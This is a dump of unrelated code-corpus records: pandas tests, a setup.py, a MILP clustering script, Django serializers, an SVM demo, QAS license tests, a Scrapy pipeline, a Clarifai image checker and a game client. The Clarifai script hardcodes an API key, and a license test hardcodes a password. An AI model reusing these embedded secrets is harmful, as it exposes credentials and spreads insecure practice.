|\\n|------:|------:|\\n| 0 \"\n \"| 1 |\\n| 1 | 2 |\\n| 2 | 3 |\"\n )\n\n\ndef test_series():\n buf = StringIO()\n s = pd.Series([1, 2, 3], name=\"foo\")\n s.to_markdown(buf=buf)\n result = buf.getvalue()\n assert result == (\n \"| | foo |\\n|---:|------:|\\n| 0 | 1 \"\n \"|\\n| 1 | 2 |\\n| 2 | 3 |\"\n )\n\n\ndef test_no_buf(capsys):\n df = pd.DataFrame([1, 2, 3])\n result = df.to_markdown()\n assert (\n result == \"| | 0 |\\n|---:|----:|\\n| 0 | 1 |\\n| 1 | 2 |\\n| 2 | 3 |\"\n )\n","sub_path":"Botnets/App/App Web/PDG-env/lib/python3.6/site-packages/pandas/tests/io/formats/test_to_markdown.py","file_name":"test_to_markdown.py","file_ext":"py","file_size_in_byte":1340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"451064668","text":"# -*- coding: utf-8 -*-\n\nimport io\nimport ast\n\ntry:\n from setuptools import setup\nexcept ImportError:\n from distutils.core import setup\n\n\ndef get_version():\n \"\"\" Parses authzync.py and fetches the version attribute from the syntax tree\n :return: authzync version\n \"\"\"\n with io.open('authzync.py') as input_file:\n for line in input_file:\n if line.startswith('__version__'):\n return ast.parse(line).body[0].value.s\n\nwith io.open('README.rst') as readme:\n setup(\n name='authzync',\n py_modules=['authzync'],\n version=get_version(),\n description='SVN AuthZ-LDAP sync tool',\n long_description=readme.read(),\n install_requires=['ldap3'],\n author='Robert Wikman',\n author_email='rbw@vault13.org',\n maintainer='Robert Wikman',\n maintainer_email='rbw@vault13.org',\n url='https://github.com/rbw0/authzync',\n download_url='https://github.com/rbw0/authzync/tarball/%s' % get_version(),\n keywords=['subversion', 'ldap', 'authz', 'sync'],\n platforms='any',\n classifiers=[\n 'Programming Language :: Python',\n ],\n license='MIT',\n )\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":1202,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"337117439","text":"#!/usr/bin/env python\n# coding: utf-8\n\nimport dill\nfrom gurobipy import *\nfrom shared import *\nfrom milpshared import *\n\ndef MIP_model_BigM(LABEL, numTracts, numModels, numFeatures, 
runtimelimit, M_val):\n # read in feature value and label value from dataframe\n DF = readindata_std(LABEL, numFeatures)\n df = DF.copy()\n\n M = M_val\n\n # feature data\n # create feature value list Xij\n X_val = df.iloc[:, 1:numFeatures+1].values.tolist()\n Y = df.iloc[:, -1].tolist() # create label value list Yi\n\n model = Model()\n\n# Basically, I've just dropped lines with a Z -- since the weight regularizer was removed, this part is no longer used (should not affect optimization, but good to remove it just to be safe). -Scott\n\n # Add variables\n X = {}\n E = {}\n W = {}\n B = {}\n C = {}\n for i in range(numTracts):\n for j in range(numFeatures):\n X[(i, j)] = X_val[i][j]\n\n for i in range(numTracts):\n for k in range(numModels):\n E[(i, k)] = model.addVar(\n lb=0, vtype=GRB.CONTINUOUS, name=\"E%d,%d\" % (i, k))\n\n for j in range(numFeatures):\n for k in range(numModels):\n W[(j, k)] = model.addVar(vtype=GRB.CONTINUOUS, name=\"W%d,%d\" % (j, k))\n\n for k in range(numModels):\n B[k] = model.addVar(vtype=GRB.CONTINUOUS, name=\"B%d\" % k)\n\n for i in range(numTracts):\n for k in range(numModels):\n C[(i, k)] = model.addVar(vtype=GRB.BINARY, name=\"C%d,%d\" % (i, k))\n\n model.update()\n\n # Add constraints\n for i in range(numTracts):\n model.addConstr(quicksum(C[(i, k)] for k in range(numModels)) == 1)\n\n for i in range(numTracts):\n for k in range(numModels):\n model.addConstr(quicksum(W[(j, k)]*X[(i, j)] for j in range(\n numFeatures)) + B[k] - Y[i] - E[(i, k)] <= M*(1-C[(i, k)]))\n\n for i in range(numTracts):\n for k in range(numModels):\n model.addConstr(quicksum(-W[(j, k)]*X[(i, j)] for j in range(\n numFeatures)) - B[k] + Y[i] - E[(i, k)] <= M*(1-C[(i, k)]))\n\n # set objective\n model.setObjective( quicksum( quicksum( E[(i,k)] for i in range(numTracts)) for k in range(numModels)))\n model.Params.timeLimit = runtimelimit # 12 hours\n# model.Params.LogFile = filepath+\"MIP_bigM_real_log_m\"+str(numModels)+\"_f\"+str(numFeatures)\n model.optimize()\n# model.write(filepath+\"MIP_bigM_real_m\"+str(numModels)+\"_f\"+str(numFeatures)+\".sol\")\n\n df = pd.DataFrame(columns=['Dec_Var', 'Val'])\n for v in model.getVars():\n df = df.append({'Dec_Var': v.varName, 'Val': v.x}, ignore_index=True)\n\n error_list = []\n error_list = [x.X for x in model.getVars() if x.VarName.find('E') != -1]\n\n# for b in myrange(0,numTracts*numModels-1,numModel):\n# if model_list_raw[b]==1:\n# mo\n\n bias_list = [x.X for x in model.getVars() if x.VarName.find('B') != -1]\n\n coef_list = [x.X for x in model.getVars() if x.VarName.find('W') != -1]\n\n MAE = 0\n for a in range(0, numTracts*numModels):\n MAE = MAE + error_list[a]\n MAE = MAE/numTracts\n\n MSE = 0\n for a in range(0, numTracts*numModels):\n MSE = MSE + math.pow(error_list[a], 2)\n MSE = MSE/numTracts\n\n# weights_df = df.iloc[211*numModels:(211*numModels+numFeatures*numModels),:]\n# intercept_df = df.iloc[(211*numModels+numFeatures*numModels):(211*numModels+numFeatures*numModels+numModels),:]\n# model_df = df.iloc[(211*numModels+numFeatures*numModels+numModels):(211*numModels+numFeatures*numModels+numModels+211*numModels),:]\n\n # return df, error, weights_df, intercept_df, model_df,model.MIPGap*100\n return df, MAE, MSE, bias_list, coef_list, model.MIPGap*100\n\n\ndef collect_result(K, F):\n # k rows, f columns (k = # of clusters, f = # of features)\n MSElist = []\n MAElist = []\n Coeflist = []\n Biaslist = []\n resultlist = []\n\n for k in tqdm(range(2, K+1)):\n MSElist_sameCluster = []\n MAElist_sameCluster = []\n Coeflist_sameCluster 
= []\n Biaslist_sameCluster = []\n resultlist_sameCluster = []\n\n for f in range(2, F+1):\n\n # run the MILP model\n M_val = pairwise_distance(211, 'change_incpc', f,k)\n result, MAE, MSE, bias_list, coef_list, _ = MIP_model_BigM(\n 'change_incpc', 211, k, f, 3600, M_val)\n\n # recording training MAE, MSE for MILP\n MAElist_sameCluster.append(MAE)\n MSElist_sameCluster.append(MSE)\n\n # recording Bias term for MILP\n Biaslist_sameCluster.append(bias_list)\n\n # recording regression coefficients for MILP\n coef_model = []\n for a in range(0, k):\n # getting all coefficients for one cluster\n flat_list = []\n for b in range(0, f):\n flat_list.append(coef_list[a+b*k])\n coef_model.append(flat_list)\n\n feature_list = list(readindata_std(\n 'change_incpc', f).iloc[:, 1:f+1].columns)\n Coef = pd.DataFrame({'feature': feature_list})\n for c in range(0, k):\n Coef['Cluster'+str(c+1)] = coef_model[c]\n Coeflist_sameCluster.append(Coef)\n\n # convert result into dataframe, each tract pair with its cluster assignment\n result_df = result.copy()\n tractid_df = readindata_std('change_incpc', f)\n result_df = result_df[result_df['Dec_Var'].str.contains(\"C\")]\n result_df = result_df[result_df['Val'] > 0.9]\n model_list = []\n for _, row in result_df.iterrows():\n assigned_label_text = row['Dec_Var']\n assigned_label = int(assigned_label_text[-1])+1\n model_list.append(assigned_label)\n tractid_df = tractid_df.assign(model=model_list)\n tractid_df = tractid_df.set_index('tractid')\n resultlist_sameCluster.append(tractid_df)\n\n bias_List = []\n for h in range(0, k):\n bias_List.append([bias_list[h]])\n with open(f'{resultpath}milp/rawresults/result_{k}{f}.pickle','wb') as f:\n pickle.dump((resultlist_sameCluster,Coeflist_sameCluster),f)\n\n\n # recording result for k-means as the initialization with lowest MAE\n MAElist.append(MAElist_sameCluster)\n MSElist.append(MSElist_sameCluster)\n Coeflist.append(Coeflist_sameCluster)\n Biaslist.append(Biaslist_sameCluster)\n resultlist.append(resultlist_sameCluster)\n\n return MSElist, MAElist, (Coeflist, Biaslist), resultlist\n\n\n\n\ndef overlap(K, F, MILP_result_df):\n MILP_result = MILP_result_df.copy()\n with open(resultpath + 'kmeansresultlist.pickle','rb') as f:\n Kmeans_result_df = pickle.load(f)\n Kmeans_result = Kmeans_result_df.copy()\n # for each combination of # of clusters & # of features\n kmeans_pairID_list = []\n kmeans_intersection_list = []\n Jaccard_AB_list = []\n Jaccard_A_list = []\n Jaccard_B_list = []\n Jaccard_index_sum_list = []\n Jaccard_index_min_list = []\n for k in range(2, K+1):\n for f in range(2, F+1):\n kmeans_cluster = []\n MILP_cluster = []\n\n # store tractid within each cluster for kmeans and MILP seperately\n for a in range(0, k):\n Kmeans_result[k-2][f-2] = Kmeans_result[k-2][f-2].reset_index()\n temp_kmeans = Kmeans_result[k-2][f -\n 2].loc[Kmeans_result[k-2][f-2]['model'] == a+1]\n kmeans_cluster.append(\n temp_kmeans['tractid'].values.flatten().tolist())\n\n MILP_result[k-2][f-2] = MILP_result[k-2][f-2].reset_index()\n temp_MILP = MILP_result[k-2][f -\n 2].loc[MILP_result[k-2][f-2]['model'] == a+1]\n MILP_cluster.append(\n temp_MILP['tractid'].values.flatten().tolist())\n\n Kmeans_result[k-2][f-2] = Kmeans_result[k -\n 2][f-2].set_index('tractid')\n MILP_result[k-2][f-2] = MILP_result[k -\n 2][f-2].set_index('tractid')\n\n # pair kmeans and MILP cluster to maximize interseted elements\n kmeans_pairID = []\n kmeans_intersection = []\n Jaccard_AB = []\n Jaccard_A = []\n Jaccard_B = []\n Jaccard_index_sum = []\n 
Jaccard_index_min = []\n\n kmeans_cluster_size = []\n kmeans_cluster_size_ordered = []\n for x in range(0, k):\n kmeans_cluster_size.append(len(kmeans_cluster[x]))\n kmeans_cluster_size_ordered.append(len(kmeans_cluster[x]))\n kmeans_cluster_size_ordered.sort(reverse=True)\n\n kmeans_cluster_order = []\n for y in range(0, k):\n kmeans_cluster_order.append(\n kmeans_cluster_size.index(kmeans_cluster_size_ordered[y]))\n\n for z in range(0, k):\n b = kmeans_cluster_order[z]\n intersection_list = []\n intersection_length_list = []\n for c in range(0, k):\n intersection = []\n intersection = list(\n set(kmeans_cluster[b]).intersection(MILP_cluster[c]))\n intersection_list.append(intersection)\n intersection_length_list.append(len(intersection))\n\n milpID = intersection_length_list.index(\n max(intersection_length_list))\n\n while (milpID in kmeans_pairID):\n intersection_length_list[milpID] = -1\n milpID = intersection_length_list.index(\n max(intersection_length_list))\n\n kmeans_pairID.append(milpID)\n kmeans_intersection.append(intersection_list[milpID])\n Jaccard_AB.append(intersection_length_list[milpID])\n Jaccard_A.append(len(kmeans_cluster[b]))\n Jaccard_B.append(len(MILP_cluster[milpID]))\n # jaccard index over sum\n Jaccard_index_sum.append(intersection_length_list[milpID]/(len(\n kmeans_cluster[b])+len(MILP_cluster[milpID])-intersection_length_list[milpID]))\n if len(MILP_cluster[milpID]) != 0:\n Jaccard_index_min.append(\n intersection_length_list[milpID]/min(len(kmeans_cluster[b]), len(MILP_cluster[milpID])))\n else:\n Jaccard_index_min.append(\n intersection_length_list[milpID]/len(kmeans_cluster[b]))\n\n kmeans_pairID_list.append(kmeans_pairID)\n kmeans_intersection_list.append(kmeans_intersection)\n Jaccard_AB_list.append(Jaccard_AB)\n Jaccard_A_list.append(Jaccard_A)\n Jaccard_B_list.append(Jaccard_B)\n Jaccard_index_sum_list.append(Jaccard_index_sum)\n Jaccard_index_min_list.append(Jaccard_index_min)\n\n # visualize the overlap on a map\n matched_tracts = []\n for d in range(0, k):\n matched_tracts = matched_tracts + kmeans_intersection[d]\n\n matched_tract_df = Kmeans_result_df[k-2][f-2].copy()\n for index, row in matched_tract_df.iterrows():\n if (index in matched_tracts):\n matched_tract_df.at[index, 'model'] = 1\n else:\n matched_tract_df.at[index, 'model'] = 0\n\n print(str(k) + ' cluster, '+str(f)+' feature:')\n for e in range(0, k):\n print('Jaccard index (sum bottom) for cluster ' +\n str(e+1)+' :'+str(Jaccard_index_sum[e]))\n print('Jaccard index (min bottom) for cluster ' +\n str(e+1)+' :'+str(Jaccard_index_min[e]))\n print('Jaccard AnB for cluster ' +\n str(e+1)+' :'+str(Jaccard_AB[e]))\n print('Jaccard A for cluster ' +\n str(e+1)+' :'+str(Jaccard_A[e]))\n print('Jaccard B for cluster ' +\n str(e+1)+' :'+str(Jaccard_B[e]))\n\n # yellow is not matched, green is matched tracts\n cluster_map(matched_tract_df, k,f,'matched_milp')\n\n return kmeans_pairID_list, kmeans_intersection_list, Jaccard_AB_list, Jaccard_A_list, Jaccard_B_list, Jaccard_index_sum_list, Jaccard_index_min_list\n\nif __name__ == '__main__':\n MILP_result = display_result(2, 2, 'milp_test1', collect_result)\n\nwith open(f'{resultpath}bigmresults/results.pickle','wb') as f:\n pickle.dump(overlap(\n 5, 5, MILP_result), f, protocol=4)\n\nwith open(f'{resultpath}bigmresults/milp.pickle','wb') as f:\n 
pickle.dump(MILP_result,f,protocol=4)\n","sub_path":"code/MILPtests.py","file_name":"MILPtests.py","file_ext":"py","file_size_in_byte":12949,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"304298135","text":"from rest_framework import serializers\n\nfrom books.models import HeroInfo, BookInfo\n\n\nclass BookInfoSerializer(serializers.ModelSerializer):\n\n class Meta:\n model = BookInfo\n fields = '__all__'\n\n\nclass BookRelateField(serializers.RelatedField):\n \"\"\"Custom field for rendering a book\"\"\"\n def to_representation(self, value):\n return 'Book: %d %s' % (value.id, value.btitle)\n\n\nclass HeroInfoSerializer(serializers.Serializer):\n hname = serializers.CharField(label='hero name', required=True, max_length=20)\n hcomment = serializers.CharField(label='hero description', required=False)\n hgender = serializers.CharField(label='hero gender', required=False)\n image = serializers.ImageField(label='hero image', required=True)\n\n # note -- in a hand-written serializer, a foreign key must be declared with a dedicated field; the related object is looked up by the framework and need not be passed manually\n # tip -- read_only marks a field that is only rendered by the server; the client does not need to send it\n # Option 1: render the foreign key as the related object's ID\n # hbook = serializers.PrimaryKeyRelatedField(label='book', read_only=True)\n\n # Option 2: render the foreign key as the related object's __str__ output\n # hbook = serializers.StringRelatedField(label='book', read_only=True)\n\n # Option 3: render the foreign key as a link to the related object's API endpoint\n # hbook = serializers.HyperlinkedRelatedField(label='book', read_only=True, view_name='books-detail')\n\n # Option 4: render the foreign key as a chosen field of the related object\n # hbook = serializers.SlugRelatedField(label='book', read_only=True, slug_field='bpub_date')\n\n # Option 5: render the foreign key with a nested serializer, automatically bound to the book object\n # hbook = BookInfoSerializer()\n\n # Option 6: customize the output format with to_representation\n hbook = BookRelateField(read_only=True)\n\n # note -- any RelatedField field marks a foreign key and is automatically bound to the related object\n","sub_path":"Django005C/books/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":1915,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"275348557","text":"import csv\nimport statistics\n\ndef get_stats(number_of_centroids, number_of_cars):\n staticcasemaximums = []\n staticcasemedians = []\n staticcasemeans = []\n basecasemaximums = []\n basecasemedians = []\n basecasemeans = []\n maximumdifferences = []\n mediandifferences = []\n meandifferences = []\n while number_of_centroids < 15:\n try:\n f = open('./staticcase-2020-12-09to11/routing_data_centroids' + str(number_of_centroids) + '_cars' + str(number_of_cars) + '.csv', 'r')\n staticcasecsvreader = csv.reader(f, delimiter=',')\n staticcasenumbers = []\n for row in staticcasecsvreader:\n if row[6] == 'Maximum Vehicle Repair Time':\n continue\n elif row[6] != '':\n staticcasenumbers.append(float(row[6]))\n else:\n staticcasenumbers.append(0.0)\n staticcasemaximums.append(max(staticcasenumbers))\n staticcasemedians.append(statistics.median(staticcasenumbers))\n staticcasemeans.append(statistics.mean(staticcasenumbers))\n f = open('./basecase-2020-12-09to11/routing_data_centroids' + str(number_of_centroids) + '_cars' + str(number_of_cars) + '.csv', 'r')\n basecasecsvreader = csv.reader(f, delimiter=',')\n basecasenumbers = []\n for row in basecasecsvreader:\n if row[6] == 'Maximum Vehicle Repair Time':\n continue\n elif row[6] != '':\n basecasenumbers.append(float(row[6]))\n else:\n basecasenumbers.append(0.0)\n basecasemaximums.append(max(basecasenumbers))\n basecasemedians.append(statistics.median(basecasenumbers))\n basecasemeans.append(statistics.mean(basecasenumbers))\n maximumdifferences.append([b - s for s, b in zip(staticcasemaximums, basecasemaximums)])\n 
mediandifferences.append([b - s for s, b in zip(staticcasemedians, basecasemedians)])\n meandifferences.append([b - s for s, b in zip(staticcasemeans, basecasemeans)])\n\n if number_of_cars > number_of_centroids * 4:\n number_of_centroids += 1\n number_of_cars = number_of_centroids * 2\n else:\n number_of_cars += number_of_centroids\n except:\n if number_of_cars > number_of_centroids * 4:\n number_of_centroids += 1\n number_of_cars = number_of_centroids * 2\n else:\n number_of_cars += number_of_centroids\n print('skipping')\n maximumdifferences = [j for sub in maximumdifferences for j in sub]\n mediandifferences = [j for sub in mediandifferences for j in sub]\n meandifferences = [j for sub in meandifferences for j in sub]\n print(statistics.mean(maximumdifferences), statistics.stdev(maximumdifferences))\n print(statistics.mean(mediandifferences), statistics.stdev(mediandifferences))\n print(statistics.mean(meandifferences), statistics.stdev(meandifferences))\n\n\nnumber_of_cars = 10\nnumber_of_centroids = 5\nget_stats(number_of_centroids, number_of_cars)","sub_path":"stats.py","file_name":"stats.py","file_ext":"py","file_size_in_byte":2866,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"445454638","text":"# -*- coding: utf-8 -*-\nfrom setuptools import setup\n\nrequirements = [\n 'flask',\n 'python-dotenv',\n # 'flask-simplelogin',\n # 'flask-admin',\n # 'flask-wtf',\n # 'flask-restful',\n # 'flask-pytest',\n # 'flask-bootstrap',\n # 'flasgger'\n]\n\n\nsetup(\n name='cms',\n version='1.0.0',\n description='Colaborasol CMS',\n packages=['webapp'],\n include_package_data=True,\n install_requires=requirements\n)\n","sub_path":"setup.py","file_name":"setup.py","file_ext":"py","file_size_in_byte":452,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"73579906","text":"import numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.metrics import precision_recall_fscore_support\nfrom sklearn.model_selection import GridSearchCV\nfrom sklearn.svm import SVC\n\ndata = np.genfromtxt('chips.txt', delimiter=',')\nX, y = np.hsplit(data, [-1])\ndata_train = np.vstack((data[0:47, :], data[58:107, :]))\ndata_test = np.vstack((data[48:57, :], data[108:117, :]))\nX_train, y_train = np.hsplit(data_train, [-1])\nX_test, y_test = np.hsplit(data_test, [-1])\n(y, y_train, y_test) = (y.ravel(), y_train.ravel(), y_test.ravel())\n\n# A common classifier to which we'll set optimal params\nclf = SVC()\n\n\ndef svc_param_selection(X, y):\n param_grid = [\n {\n 'kernel': ['linear'],\n 'C': [0.001, 0.01, 0.1, 1, 10]\n },\n {\n 'kernel': ['poly', 'rbf', 'sigmoid'],\n 'C': [0.001, 0.01, 0.1, 1, 10],\n 'gamma': [0.001, 0.01, 0.1, 1]\n }\n ]\n grid_search = GridSearchCV(estimator=clf, param_grid=param_grid, cv=3)\n grid_search.fit(X, y)\n return grid_search.best_params_\n\n\n# Calculate best parameters for SVC using GridSearchCV\nbest_params = svc_param_selection(X, y)\nprint(f\"best params: {best_params}\")\n\n# Fit the model using best params and predict\nclf.set_params(**best_params)\nclf.fit(X_train, y_train)\npred_train = clf.predict(X_train)\npred_test = clf.predict(X_test)\n\n# Calculate metrics\n(precision_train, recall_train, _, _) = \\\n precision_recall_fscore_support(y_true=y_train, y_pred=pred_train, average='binary')\n(precision_test, recall_test, _, _) = \\\n precision_recall_fscore_support(y_true=y_test, y_pred=pred_test, average='binary')\nprint(f\"precision_train:\\t{precision_train:5f}, 
recall_train:\\t{recall_train:5f}\")\nprint(f\"precision_test:\\t\\t{precision_test:5f}, recall_test:\\t{recall_test:5f}\")\n\n# Print results on a plot\n# Test data elements will be circled out\nplt.scatter(X[:, 0], X[:, 1], c=y, zorder=10, cmap=plt.cm.Paired, edgecolor='k', s=20)\nplt.scatter(X_test[:, 0], X_test[:, 1], s=80, facecolors='none', zorder=10, edgecolor='k')\n\n# Draw separating plane on a colored layout\nplt.axis('tight')\nx_min = X[:, 0].min()\nx_max = X[:, 0].max()\ny_min = X[:, 1].min()\ny_max = X[:, 1].max()\nXX, YY = np.mgrid[x_min:x_max:200j, y_min:y_max:200j]\nZ = clf.decision_function(np.c_[XX.ravel(), YY.ravel()])\nZ = Z.reshape(XX.shape)\nplt.contour(XX, YY, Z, colors=['k', 'k', 'k'], linestyles=['--', '-', '--'], levels=[-.5, 0, .5])\nplt.pcolormesh(XX, YY, Z > 0, cmap=plt.cm.Paired)\n\nplt.show()\n","sub_path":"task2/task2_svm.py","file_name":"task2_svm.py","file_ext":"py","file_size_in_byte":2498,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"388572917","text":"from vastestcase import *\n\nfrom user import User\n\nclass licenseTests(VasTestCase):\n \"\"\"License Test\n Author: Chris Saxey\n \"\"\"\n\n @classmethod\n def setUpClass(cls):\n cls.tempDirectory = '/tmp/lic/'\n cls.licenseDirectory = '/etc/opt/quest/vas/.licenses/'\n cls.validLicenseName = '{}VAS_license_123-45680'.format(cls.licenseDirectory)\n cls.invalidLicenseName = '/tmp/VAS_license_123-45680'\n cls.masterList = []\n cls.masterList.append({'License': '/etc/opt/quest/vas/.licenses/license2.txt', \n 'Status': 'Valid License', 'Servers': '0', 'Users': '10', 'Expiration Date': 'Never'})\n cls.masterList.append({'License': '/etc/opt/quest/vas/.licenses/license5.txt', \n 'Status': 'Valid License', 'Servers': '0', 'Users': '5000', 'Expiration Date': 'Never'})\n cls.computer.remoteShell.run('mkdir {}'.format(cls.tempDirectory))\n \n def test_01_TestForValidLicense(self):\n \"\"\"Check for a valid license\n Purpose: Checks for a valid license\n Tags: license\n Requirements: QAS is installed\n Component: License\n \n Steps:\n 1. Install desired version of QAS; Should install without any errors \n 2. Check for licenses: /opt/quest/bin/vastool -u Administrator@A.SB -w {password} license -i; Should valid licenses\n \"\"\" \n output, returnCode, licenses = self.computer.vastool.License(licenseOptions='-i')\n self.assertTrue(returnCode)\n success = False\n for lic in licenses:\n if lic['License'] == self.validLicenseName:\n self.assertEqual(lic['Status'], 'Valid License')\n self.assertEqual(lic['Servers'], '10')\n self.assertEqual(lic['Users'], '10')\n success = True\n self.assertTrue(success)\n \n def test_02_TestForInvalidLicense(self):\n \"\"\"Check for an invalid license\n Purpose: Checks for an invalid license\n Tags: license\n Requirements: QAS is installed\n Component: License\n \n Steps:\n 1. Install desired version of QAS; Should install without any errors \n 2. Move the license files to tmp; We need to move them so they dont show up\n 3. mv /etc/opt/quest/vas/.licenses/VAS_license_123-45680 /tmp/VAS_license_123-45680; Should not complain\n 4. Create a bad file: sed \"s/Users: 5000/Users: 9000/\" /etc/opt/quest/vas/.licenses/VAS_license_123-45680 > /etc/opt/quest/vas/.licenses/VAS_license_123-45680; should create a bad file \n 5. 
Check again: /opt/quest/bin/vastool -u Administrator@A.SB -w {password} license -i; Should show no valid licenses are installed\n        \"\"\" \n        self.assertEqual(self.computer.remoteShell.run('mv {} {}'.format(self.validLicenseName, \n                                                                         self.invalidLicenseName)), 0)\n        self.assertEqual(self.computer.remoteShell.run('rm -f {}*'.format(self.licenseDirectory)), 0)\n        self.assertEqual(self.computer.remoteShell.run('mv {} {}'.format(self.invalidLicenseName, \n                                                                         self.validLicenseName)), 0)\n        self.assertEqual(self.computer.remoteShell.run('sed \"s/Users: 5000/Users: 9000/\" {} > {}'.format(\n                                                       self.validLicenseName, self.validLicenseName)), 0)\n        output, returnCode, licenses = self.computer.vastool.License(licenseOptions='-i')\n        self.assertTrue(returnCode, 'Failed to run vastool license')\n        self.assertGreater(output.find('---QAS ---\\r\\nNo valid licenses are installed'), -1)\n    \n    def test_03_TestAllLicenses(self):\n        \"\"\"Check all licenses\n        Purpose: Check all licenses\n        Tags: license\n        Requirements: QAS is installed\n        Component: License\n        \n        Steps:\n        1. Install desired version of QAS; Should install without any errors \n        \"\"\" \n        halYa = User(password='auto123')\n        self.assertTrue(self.computer.remoteShell.run(\"rm -f /etc/opt/quest/vas/.licenses/*\") == 0, \n                        'Failed to remove all licenses')\n        self.assertTrue(self.computer.scp(\"hal9000.vintela.com:/automation/cvs/DEV/vasqa/misc/licenses/*.*\",\n                        \"/etc/opt/quest/vas/.licenses/\", halYa), 'Failed to copy licenses')\n        output, returnCode, licenses = self.computer.vastool.License(licenseOptions='-i')\n        self.assertTrue(returnCode, 'Failed to run vastool license')\n        diff = self.computer.vastool.compareLicenses(self.masterList, licenses)\n        for d in diff:\n            self.logger.error('{} did not contain {}'.format(d[0], d[1]))\n            self.fail('Licenses were not read as expected')\n\n    @classmethod\n    def tearDownClass(cls):\n        cls.computer.remoteShell.run(\"rm -rf {}\".format(cls.tempDirectory))\n","sub_path":"smokeTests/test_licenseTests.py","file_name":"test_licenseTests.py","file_ext":"py","file_size_in_byte":4899,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"591577319","text":"# -*- coding: utf-8 -*-\n\n# Define your item pipelines here\n#\n# Don't forget to add your pipeline to the ITEM_PIPELINES setting\n# See: http://doc.scrapy.org/en/latest/topics/item-pipeline.html\nfrom scrapy.exceptions import DropItem\n\nclass LeetcodespiderPipeline(object):\n\tlang = [' c ', ' c++ ', ' C++ ', 'c ', 'c++ ', 'C++ ']\n\tdef process_item(self, item, spider):\n\t\tfor l in self.lang:\n\t\t\tif l in item['answer']['title']:\n\t\t\t\titem['answer']['lang'] = l.strip().upper()\n\t\t\t\treturn item\n\t\traise DropItem(\"Not target language\")\n","sub_path":"Spider/leetcodeSpider/pipelines.py","file_name":"pipelines.py","file_ext":"py","file_size_in_byte":537,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"}
+{"seq_id":"391988166","text":"from clarifai.rest import ClarifaiApp, client, Image\nimport pprint\n\ndef img_has_cat(filename):#url):\n    app = ClarifaiApp(api_key=\"ee15b61906ee4423b5c9bea34977228d\")\n    model = app.models.get(\"general-v1.3\")\n    \n    try:\n        image = Image(file_obj=open(filename, 'rb'))\n        #result = model.predict_by_url(url=url)\n        result = model.predict([image])\n        try:\n            items = result['outputs'][0]['data']['concepts']\n            for item in items:\n                if item['name'] == 'cat':\n                    return True\n            return False\n        except (IndexError):\n            return False\n    except 
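As the header comment in pipelines.py notes, a pipeline only runs once it is listed in ITEM_PIPELINES. A typical settings.py entry; the dotted path below follows the record's sub_path and is an assumption about the project layout:

```python
# settings.py of the Scrapy project; lower numbers run earlier (range 0-1000).
ITEM_PIPELINES = {
    'leetcodeSpider.pipelines.LeetcodespiderPipeline': 300,
}
```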
(client.ApiError):\n return False\n \nif __name__ == \"__main__\":\n #print(img_has_cat(\"http://www.catster.com/wp-content/uploads/2017/08/A-fluffy-cat-looking-funny-surprised-or-concerned.jpg\"))\n #print(img_has_cat(\"http://images2.fanpop.com/image/photos/11700000/Catwomen-3-catwomen-11767352-600-900.jpg\"))\n #print(img_has_cat(\"http://images2.fanpop.com/image/photos/11700000/Catwomen-3-catwomen-11\"))\n print(img_has_cat(\"cats/cat1.jpg\"))\n\n \n #pp = pprint.PrettyPrinter(indent=2)\n #print(result)\n #pp.pprint(result['outputs'][0]['data']['concepts'])","sub_path":"cat_checker.py","file_name":"cat_checker.py","file_ext":"py","file_size_in_byte":1239,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"20412288","text":"import sys\nimport os\nfrom game.common.enums import *\nfrom game.common.node_types import get_node\nfrom game.common.unit_classes import get_unit\nfrom game.common.monster_types import get_monster\nfrom game.common.trap_types import get_trap\n\nimport sys\n\nclass ClientStorefront:\n def __init__(self, turn_data):\n self.items = turn_data[\"items\"]\n self.purchases = []\n self.town_number = turn_data[\"town_number\"]\n\n def get_town_number(self):\n return self.town_number\n\n\n def purchase(self, unit, item, item_level, item_slot=None):\n if item_slot:\n self.purchases.append( {\n \"unit\": unit.id,\n \"slot\": item_slot,\n \"item\": item,\n \"item_level\": item_level\n } )\n else:\n self.purchases.append( {\n \"unit\": unit.id,\n \"item\": item,\n \"item_level\": item_level\n } )\n\n def get_return_data(self):\n return {\n \"message_type\": MessageType.town,\n \"purchases\": self.purchases\n }\n\nclass ClientLogic:\n\n def __init__(self, verbose, player_client):\n self._loop = None\n self._socket_client = None\n self.verbose = verbose\n self.player_client = player_client\n\n # check to see if the client defiens the quit_in_game_over variable\n self.quit_on_game_over = getattr(self.player_client, \"quit_on_game_over\", True)\n\n # Public properties availiable to users\n\n self.started_game = False\n self.tick_no = 0\n\n def set_loop(self, loop):\n self._loop = loop\n\n def set_socket_client(self, socket_client):\n self._socket_client = socket_client\n\n def initialize(self):\n\n self.send({\n \"type\": \"register\"\n })\n\n def tick(self, turn_data):\n self.tick_no += 1\n\n turn_data = self.deserialize(turn_data)\n\n try:\n turn_result = self.turn(turn_data)\n except Exception as e:\n print()\n print(\"Exception:\")\n print(e)\n sys.exit(1)\n\n serialized_turn_result = self.serialize(turn_result)\n\n self.send({\n \"type\": \"client_turn\",\n \"payload\": serialized_turn_result\n })\n\n def turn(self, turn_data):\n\n if turn_data[\"message_type\"] == MessageType.unit_choice:\n team_name = self.player_client.team_name()\n choices = self.player_client.unit_choice()\n return {\n \"message_type\": MessageType.unit_choice,\n \"team_name\": team_name,\n \"units\": choices\n }\n\n elif turn_data[\"message_type\"] == MessageType.town:\n units = turn_data[\"units\"]\n gold = turn_data[\"gold\"]\n store = ClientStorefront(turn_data)\n self.player_client.town(units, gold, store)\n return store.get_return_data()\n\n elif turn_data[\"message_type\"] == 